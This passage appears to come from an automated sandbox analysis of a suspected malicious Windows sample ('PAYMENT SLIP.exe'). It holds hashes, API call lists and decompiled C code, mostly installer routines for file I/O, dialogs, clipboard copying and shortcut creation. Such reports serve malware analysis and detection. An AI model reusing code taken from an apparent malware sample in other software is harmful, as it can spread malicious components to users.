              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00B11BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 00B11BFF
              • CreateDirectoryW.KERNELBASE(000000FF,00000000,000000FF,1C200000,1A6CF026,?,?,?,00B120D6,?,?,?,?,00B11921,?,?), ref: 00B11C5F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: AttributesCreateDirectoryFile
              • String ID:
              • API String ID: 3401506121-0
              • Opcode ID: ada78cb5b12b542870f83b1baa29243625b9d41bf1e615c763f2493063917f33
              • Instruction ID: 0798301b3c7e3c22d5ab3f23e62fe6b7561dcb45aa2d067fa04c981a85a1ead3
              • Opcode Fuzzy Hash: ada78cb5b12b542870f83b1baa29243625b9d41bf1e615c763f2493063917f33
              • Instruction Fuzzy Hash: 06E06D30A50209BACF20AB75CC81AEE7EE8DB01740F9008E4FA01D9210E6328AA0A694
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 00B11BFF
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction ID: e683db93034b9afb342550f41a04d917527f0dfe2fd70eb3b6722bd4351d420c
              • Opcode Fuzzy Hash: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction Fuzzy Hash: 01F01C74C40208EFDB00EFA8C8496ECBBB0EB00311F904AE5E9206B291D7314AE1DB84
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004060E4(void* _a4, void* _a8, long _a12) {
              				int _t7;
              				long _t11;
              
              				_t11 = _a12;
              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
              				if(_t7 == 0 || _t11 != _a12) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}

              APIs
              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FF7B,0040CEF0,00403511,0040CEF0,0040FF7B,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004060B5(void* _a4, void* _a8, long _a12) {
              				int _t7;
              				long _t11;
              
              				_t11 = _a12;
              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
              				if(_t7 == 0 || _t11 != _a12) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}

              APIs
              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00403590(long _a4) {
              				long _t2;
              
              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
              				return _t2;
              			}

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 00B1128F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 7b63a79f8f34518ecf7670f7cf5aa5bcc874eda58d09a4447a20b6297363c5fb
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: F0D017B1C50308BBCB04EBA0C84689DBBACDB05301F60819AB80066101DA759B609A94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 95%
              			E004056E3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
              				struct HWND__* _v8;
              				long _v12;
              				struct tagRECT _v28;
              				void* _v36;
              				signed int _v40;
              				int _v44;
              				int _v48;
              				signed int _v52;
              				int _v56;
              				void* _v60;
              				void* _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				struct HWND__* _t94;
              				long _t95;
              				int _t100;
              				void* _t108;
              				intOrPtr _t130;
              				struct HWND__* _t134;
              				int _t156;
              				int _t159;
              				struct HMENU__* _t164;
              				struct HWND__* _t168;
              				struct HWND__* _t169;
              				int _t171;
              				void* _t172;
              				short* _t173;
              				short* _t175;
              				int _t177;
              
              				_t169 =  *0x429244;
              				_t156 = 0;
              				_v8 = _t169;
              				if(_a8 != 0x110) {
              					if(_a8 == 0x405) {
              						CloseHandle(CreateThread(0, 0, E00405677, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
              					}
              					if(_a8 != 0x111) {
              						L17:
              						_t171 = 1;
              						if(_a8 != 0x404) {
              							L25:
              							if(_a8 != 0x7b) {
              								goto L20;
              							}
              							_t94 = _v8;
              							if(_a12 != _t94) {
              								goto L20;
              							}
              							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
              							_a8 = _t95;
              							if(_t95 <= _t156) {
              								L36:
              								return 0;
              							}
              							_t164 = CreatePopupMenu();
              							AppendMenuW(_t164, _t156, _t171, E00406579(_t156, _t164, _t171, _t156, 0xffffffe1));
              							_t100 = _a16;
              							_t159 = _a16 >> 0x10;
              							if(_a16 == 0xffffffff) {
              								GetWindowRect(_v8,  &_v28);
              								_t100 = _v28.left;
              								_t159 = _v28.top;
              							}
              							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
              								_v60 = _t156;
              								_v48 = 0x423748;
              								_v44 = 0x1000;
              								_a4 = _a8;
              								do {
              									_a4 = _a4 - 1;
              									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
              								} while (_a4 != _t156);
              								OpenClipboard(_t156);
              								EmptyClipboard();
              								_t108 = GlobalAlloc(0x42, _t171 + _t171);
              								_a4 = _t108;
              								_t172 = GlobalLock(_t108);
              								do {
              									_v48 = _t172;
              									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
              									 *_t173 = 0xd;
              									_t175 = _t173 + 2;
              									 *_t175 = 0xa;
              									_t172 = _t175 + 2;
              									_t156 = _t156 + 1;
              								} while (_t156 < _a8);
              								GlobalUnlock(_a4);
              								SetClipboardData(0xd, _a4);
              								CloseClipboard();
              							}
              							goto L36;
              						}
              						if( *0x42922c == _t156) {
              							ShowWindow( *0x42a268, 8);
              							if( *0x42a30c == _t156) {
              								E004055A4( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
              							}
              							E0040446B(_t171);
              							goto L25;
              						}
              						 *0x421f18 = 2;
              						E0040446B(0x78);
              						goto L20;
              					} else {
              						if(_a12 != 0x403) {
              							L20:
              							return E004044F9(_a8, _a12, _a16);
              						}
              						ShowWindow( *0x429230, _t156);
              						ShowWindow(_t169, 8);
              						E004044C7(_t169);
              						goto L17;
              					}
              				}
              				_v52 = _v52 | 0xffffffff;
              				_v40 = _v40 | 0xffffffff;
              				_t177 = 2;
              				_v60 = _t177;
              				_v56 = 0;
              				_v48 = 0;
              				_v44 = 0;
              				asm("stosd");
              				asm("stosd");
              				_t130 =  *0x42a274;
              				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
              				_a12 =  *((intOrPtr*)(_t130 + 0x60));
              				 *0x429230 = GetDlgItem(_a4, 0x403);
              				 *0x429228 = GetDlgItem(_a4, 0x3ee);
              				_t134 = GetDlgItem(_a4, 0x3f8);
              				 *0x429244 = _t134;
              				_v8 = _t134;
              				E004044C7( *0x429230);
              				 *0x429234 = E00404E20(4);
              				 *0x42924c = 0;
              				GetClientRect(_v8,  &_v28);
              				_v52 = _v28.right - GetSystemMetrics(_t177);
              				SendMessageW(_v8, 0x1061, 0,  &_v60);
              				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
              				if(_a8 >= 0) {
              					SendMessageW(_v8, 0x1001, 0, _a8);
              					SendMessageW(_v8, 0x1026, 0, _a8);
              				}
              				if(_a12 >= _t156) {
              					SendMessageW(_v8, 0x1024, _t156, _a12);
              				}
              				_push( *((intOrPtr*)(_a16 + 0x30)));
              				_push(0x1b);
              				E00404492(_a4);
              				if(( *0x42a27c & 0x00000003) != 0) {
              					ShowWindow( *0x429230, _t156);
              					if(( *0x42a27c & 0x00000002) != 0) {
              						 *0x429230 = _t156;
              					} else {
              						ShowWindow(_v8, 8);
              					}
              					E004044C7( *0x429228);
              				}
              				_t168 = GetDlgItem(_a4, 0x3ec);
              				SendMessageW(_t168, 0x401, _t156, 0x75300000);
              				if(( *0x42a27c & 0x00000004) != 0) {
              					SendMessageW(_t168, 0x409, _t156, _a12);
              					SendMessageW(_t168, 0x2001, _t156, _a8);
              				}
              				goto L36;
              			}

              APIs
              • GetDlgItem.USER32 ref: 00405741
              • GetDlgItem.USER32 ref: 00405750
              • GetClientRect.USER32 ref: 0040578D
              • GetSystemMetrics.USER32 ref: 00405794
              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
              • ShowWindow.USER32(?,00000008), ref: 00405830
              • GetDlgItem.USER32 ref: 00405851
              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
              • GetDlgItem.USER32 ref: 0040575F
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • GetDlgItem.USER32 ref: 004058A3
              • CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
              • CloseHandle.KERNEL32(00000000), ref: 004058B8
              • ShowWindow.USER32(00000000), ref: 004058DC
              • ShowWindow.USER32(?,00000008), ref: 004058E1
              • ShowWindow.USER32(00000008), ref: 0040592B
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
              • CreatePopupMenu.USER32 ref: 00405970
              • AppendMenuW.USER32 ref: 00405984
              • GetWindowRect.USER32 ref: 004059A4
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
              • OpenClipboard.USER32(00000000), ref: 00405A05
              • EmptyClipboard.USER32 ref: 00405A0B
              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
              • GlobalLock.KERNEL32 ref: 00405A21
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
              • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
              • CloseClipboard.USER32 ref: 00405A66
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: H7B${
              • API String ID: 590372296-2256286769
              • Opcode ID: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
              • Opcode Fuzzy Hash: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E00404983(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
              				signed int _v8;
              				signed int _v12;
              				long _v16;
              				long _v20;
              				long _v24;
              				char _v28;
              				intOrPtr _v32;
              				long _v36;
              				char _v40;
              				unsigned int _v44;
              				signed int _v48;
              				WCHAR* _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				WCHAR* _v72;
              				void _v76;
              				struct HWND__* _v80;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t82;
              				long _t87;
              				short* _t89;
              				void* _t95;
              				signed int _t96;
              				int _t109;
              				signed short _t114;
              				signed int _t118;
              				struct HWND__** _t122;
              				intOrPtr* _t138;
              				WCHAR* _t146;
              				unsigned int _t150;
              				signed int _t152;
              				unsigned int _t156;
              				signed int _t158;
              				signed int* _t159;
              				signed int* _t160;
              				struct HWND__* _t166;
              				struct HWND__* _t167;
              				int _t169;
              				unsigned int _t197;
              
              				_t156 = __edx;
              				_t82 =  *0x422720;
              				_v32 = _t82;
              				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
              				if(_a8 == 0x40b) {
              					E00405B86(0x3fb, _t146);
              					E004067EB(_t146);
              				}
              				_t167 = _a4;
              				if(_a8 != 0x110) {
              					L8:
              					if(_a8 != 0x111) {
              						L20:
              						if(_a8 == 0x40f) {
              							L22:
              							_v8 = _v8 & 0x00000000;
              							_v12 = _v12 & 0x00000000;
              							E00405B86(0x3fb, _t146);
              							if(E00405F19(_t186, _t146) == 0) {
              								_v8 = 1;
              							}
              							E0040653C(0x421718, _t146);
              							_t87 = E00406931(1);
              							_v16 = _t87;
              							if(_t87 == 0) {
              								L30:
              								E0040653C(0x421718, _t146);
              								_t89 = E00405EBC(0x421718);
              								_t158 = 0;
              								if(_t89 != 0) {
              									 *_t89 = 0;
              								}
              								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
              									goto L35;
              								} else {
              									_t169 = 0x400;
              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
              									asm("cdq");
              									_v48 = _t109;
              									_v44 = _t156;
              									_v12 = 1;
              									goto L36;
              								}
              							} else {
              								_t159 = 0;
              								if(0 == 0x421718) {
              									goto L30;
              								} else {
              									goto L26;
              								}
              								while(1) {
              									L26:
              									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
              									if(_t114 != 0) {
              										break;
              									}
              									if(_t159 != 0) {
              										 *_t159 =  *_t159 & _t114;
              									}
              									_t160 = E00405E5D(0x421718);
              									 *_t160 =  *_t160 & 0x00000000;
              									_t159 = _t160;
              									 *_t159 = 0x5c;
              									if(_t159 != 0x421718) {
              										continue;
              									} else {
              										goto L30;
              									}
              								}
              								_t150 = _v44;
              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
              								_v44 = _t150 >> 0xa;
              								_v12 = 1;
              								_t158 = 0;
              								__eflags = 0;
              								L35:
              								_t169 = 0x400;
              								L36:
              								_t95 = E00404E20(5);
              								if(_v12 != _t158) {
              									_t197 = _v44;
              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
              										_v8 = 2;
              									}
              								}
              								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
              									E00404E08(0x3ff, 0xfffffffb, _t95);
              									if(_v12 == _t158) {
              										SetDlgItemTextW(_a4, _t169, 0x421708);
              									} else {
              										E00404D3F(_t169, 0xfffffffc, _v48, _v44);
              									}
              								}
              								_t96 = _v8;
              								 *0x42a324 = _t96;
              								if(_t96 == _t158) {
              									_v8 = E0040140B(7);
              								}
              								if(( *(_v32 + 0x14) & _t169) != 0) {
              									_v8 = _t158;
              								}
              								E004044B4(0 | _v8 == _t158);
              								if(_v8 == _t158 &&  *0x423738 == _t158) {
              									E004048DC();
              								}
              								 *0x423738 = _t158;
              								goto L53;
              							}
              						}
              						_t186 = _a8 - 0x405;
              						if(_a8 != 0x405) {
              							goto L53;
              						}
              						goto L22;
              					}
              					_t118 = _a12 & 0x0000ffff;
              					if(_t118 != 0x3fb) {
              						L12:
              						if(_t118 == 0x3e9) {
              							_t152 = 7;
              							memset( &_v76, 0, _t152 << 2);
              							_v80 = _t167;
              							_v72 = 0x423748;
              							_v60 = E00404CD9;
              							_v56 = _t146;
              							_v68 = E00406579(_t146, 0x423748, _t167, 0x421f20, _v12);
              							_t122 =  &_v80;
              							_v64 = 0x41;
              							__imp__SHBrowseForFolderW(_t122);
              							if(_t122 == 0) {
              								_a8 = 0x40f;
              							} else {
              								__imp__CoTaskMemFree(_t122);
              								E00405E11(_t146);
              								_t125 =  *((intOrPtr*)( *0x42a274 + 0x11c));
              								if( *((intOrPtr*)( *0x42a274 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
              									E00406579(_t146, 0x423748, _t167, 0, _t125);
              									if(lstrcmpiW(0x428200, 0x423748) != 0) {
              										lstrcatW(_t146, 0x428200);
              									}
              								}
              								 *0x423738 =  *0x423738 + 1;
              								SetDlgItemTextW(_t167, 0x3fb, _t146);
              							}
              						}
              						goto L20;
              					}
              					if(_a12 >> 0x10 != 0x300) {
              						goto L53;
              					}
              					_a8 = 0x40f;
              					goto L12;
              				} else {
              					_t166 = GetDlgItem(_t167, 0x3fb);
              					if(E00405E88(_t146) != 0 && E00405EBC(_t146) == 0) {
              						E00405E11(_t146);
              					}
              					 *0x429238 = _t167;
              					SetWindowTextW(_t166, _t146);
              					_push( *((intOrPtr*)(_a16 + 0x34)));
              					_push(1);
              					E00404492(_t167);
              					_push( *((intOrPtr*)(_a16 + 0x30)));
              					_push(0x14);
              					E00404492(_t167);
              					E004044C7(_t166);
              					_t138 = E00406931(8);
              					if(_t138 == 0) {
              						L53:
              						return E004044F9(_a8, _a12, _a16);
              					} else {
              						 *_t138(_t166, 1);
              						goto L8;
              					}
              				}
              			}














































              APIs
              • GetDlgItem.USER32 ref: 004049D2
              • SetWindowTextW.USER32(00000000,?), ref: 004049FC
              • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
              • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
              • lstrcmpiW.KERNEL32(KXCJDFJSKF,00423748,00000000,?,?), ref: 00404AEA
              • lstrcatW.KERNEL32(?,KXCJDFJSKF), ref: 00404AF6
              • SetDlgItemTextW.USER32 ref: 00404B08
                • Part of subcall function 00405B86: GetDlgItemTextW.USER32 ref: 00405B99
                • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                • Part of subcall function 004067EB: CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                • Part of subcall function 00404D3F: SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$H7B$KXCJDFJSKF
              • API String ID: 2624150263-3518105192
              • Opcode ID: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
              • Opcode Fuzzy Hash: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E004021A2(void* __eflags) {
              				signed int _t52;
              				void* _t56;
              				intOrPtr* _t60;
              				intOrPtr _t61;
              				intOrPtr* _t62;
              				intOrPtr* _t64;
              				intOrPtr* _t66;
              				intOrPtr* _t68;
              				intOrPtr* _t70;
              				intOrPtr* _t72;
              				intOrPtr* _t74;
              				intOrPtr* _t76;
              				intOrPtr* _t78;
              				intOrPtr* _t80;
              				void* _t83;
              				intOrPtr* _t91;
              				signed int _t101;
              				signed int _t105;
              				void* _t107;
              
              				 *((intOrPtr*)(_t107 - 0x10)) = E00402D3E(0xfffffff0);
              				 *((intOrPtr*)(_t107 - 0x44)) = E00402D3E(0xffffffdf);
              				 *((intOrPtr*)(_t107 - 8)) = E00402D3E(2);
              				 *((intOrPtr*)(_t107 - 0x4c)) = E00402D3E(0xffffffcd);
              				 *((intOrPtr*)(_t107 - 0xc)) = E00402D3E(0x45);
              				_t52 =  *(_t107 - 0x20);
              				 *(_t107 - 0x50) = _t52 & 0x00000fff;
              				_t101 = _t52 & 0x00008000;
              				_t105 = _t52 >> 0x0000000c & 0x00000007;
              				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
              				if(E00405E88( *((intOrPtr*)(_t107 - 0x44))) == 0) {
              					E00402D3E(0x21);
              				}
              				_t56 = _t107 + 8;
              				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
              				if(_t56 < _t83) {
              					L14:
              					 *((intOrPtr*)(_t107 - 4)) = 1;
              					_push(0xfffffff0);
              				} else {
              					_t60 =  *((intOrPtr*)(_t107 + 8));
              					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
              					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
              					if(_t61 >= _t83) {
              						_t64 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
              						if(_t101 == _t83) {
              							_t80 =  *((intOrPtr*)(_t107 + 8));
              							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
              						}
              						if(_t105 != _t83) {
              							_t78 =  *((intOrPtr*)(_t107 + 8));
              							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
              						}
              						_t66 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
              						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
              						if( *_t91 != _t83) {
              							_t76 =  *((intOrPtr*)(_t107 + 8));
              							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
              						}
              						_t68 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
              						_t70 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
              						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
              							_t74 =  *((intOrPtr*)(_t107 - 0x38));
              							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
              						}
              						_t72 =  *((intOrPtr*)(_t107 - 0x38));
              						 *((intOrPtr*)( *_t72 + 8))(_t72);
              					}
              					_t62 =  *((intOrPtr*)(_t107 + 8));
              					 *((intOrPtr*)( *_t62 + 8))(_t62);
              					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
              						_push(0xfffffff4);
              					} else {
              						goto L14;
              					}
              				}
              				E00401423();
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t107 - 4));
              				return 0;
              			}























              APIs
              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: CreateInstance
              • String ID:
              • API String ID: 542301482-0
              • Opcode ID: 72dc8e9db93c4c674b083c5b9862340eb2a4a3a434f4dc697f40a6002f3ad846
              • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
